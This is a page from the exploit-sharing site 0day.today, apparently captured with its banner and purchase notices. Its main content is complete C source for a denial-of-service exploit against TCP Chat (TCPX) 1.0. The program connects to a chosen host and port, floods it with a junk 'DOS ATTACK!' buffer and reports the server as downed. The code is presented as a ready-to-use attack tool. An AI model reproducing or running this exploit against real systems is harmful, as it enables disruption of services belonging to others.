0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TCP Chat (TCPX) 1.0 Denial of Service Exploit
============================================= TCP Chat (TCPX) 1.0 Denial of Service Exploit ============================================= /* TCP Chat(TCPX) DoS Exploit ---------------------------------------- Resolve host... [OK] [+] Connecting... [OK] Target locked Sending bad procedure... [OK] [+] Server DoS'ed Tested on Windows2000 SP4 Info: infamous.2hell.com / basher13@linuxmail.org */ #include <string.h> #include <winsock2.h> #include <stdio.h> #pragma comment(lib, "ws2_32.lib") char doscore[] = "*** TCP Chat 1.0 DOS Exploit \n" "***-----------------------------------------------\n" "*** Infam0us Gr0up - Securiti Research Team \n\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n" "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"; int main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; struct hostent *pTarget; struct sockaddr_in sock; char *target; int port,bufsize; SOCKET inetdos; if (argc < 2) { printf(" TCP Chat(TCPX) DoS Exploit \n", argv[0]); printf(" ------------------------------------------\n", argv[0]); printf(" Infam0us Gr0up - Securiti Research\n\n", argv[0]); printf("[-]Usage: %s [target] [port]\n", argv[0]); printf("[?]Exam: %s localhost 1234\n", argv[0]); exit(1); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; target = argv[1]; port = 1234; if (argc >= 3) port = atoi(argv[2]); bufsize = 1024; if (argc >= 4) bufsize = atoi(argv[3]); inetdos = socket(AF_INET, SOCK_STREAM, 0); if(inetdos==INVALID_SOCKET) { printf("Socket ERROR \n"); exit(1); } printf(" TCP Chat(TCPX) DoS Exploit \n", argv[0]); printf(" ------------------------------------------\r\n\n", argv[0]); printf("Resolve host... "); if ((pTarget = gethostbyname(target)) == NULL) { printf("FAILED \n", argv[0]); exit(1); } printf("[OK]\n "); memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons((USHORT)port); printf("[+] Connecting... "); if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) ))) { printf("FAILED\n"); exit(1); } printf("[OK]\n"); printf("Target locked\n"); printf("Sending bad procedure... "); if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1) { printf("ERROR\n"); closesocket(inetdos); exit(1); } printf("[OK]\n "); printf("[+] Server DoS'ed\n"); closesocket(inetdos); WSACleanup(); return 0; } # 0day.today [2024-07-08] #